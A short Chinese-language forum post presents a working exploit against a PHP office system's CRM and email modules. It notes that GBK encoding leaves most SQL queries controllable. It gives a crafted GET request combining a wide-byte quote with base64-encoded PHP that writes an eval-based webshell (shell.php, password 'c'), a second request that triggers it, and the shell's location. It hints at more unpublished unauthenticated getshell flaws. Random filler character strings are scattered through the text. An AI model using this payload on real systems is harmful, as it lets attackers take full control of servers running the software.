此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.4 K6 d4 G( @" g5 t% I" c2 J
- {7 A: G. o8 ~$ {/ X8 q5 d
! ^* l! h' F& J" |
EXP:6 d: m& B) o$ ]. Y) i* w0 M7 E
" }7 ?$ T7 X- R. n6 S5 t& A( R
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}) {3 y0 z8 S7 e" s' k3 G! t( f
# w V$ R$ [- @# p: R$ u# N& Y" L; s4 @第二步: [GET]http://site/general/email/index.php
8 q. h, x' K) g/ m
6 a+ q; \5 Z% l! k4 ASHELL: http://site/general/email/shell.php 密码C' N. D& l1 U) S& `
0 U# r# t& D* c. n% h
+ W+ w: |& ]: {/ Q
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好# L" Q/ l/ W1 ?. t1 z
: Y) d l, }. W- c9 D
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
' W, d7 w# Z V- T; o
& A- L2 N+ m( m1 W
" ? a0 p( O" U |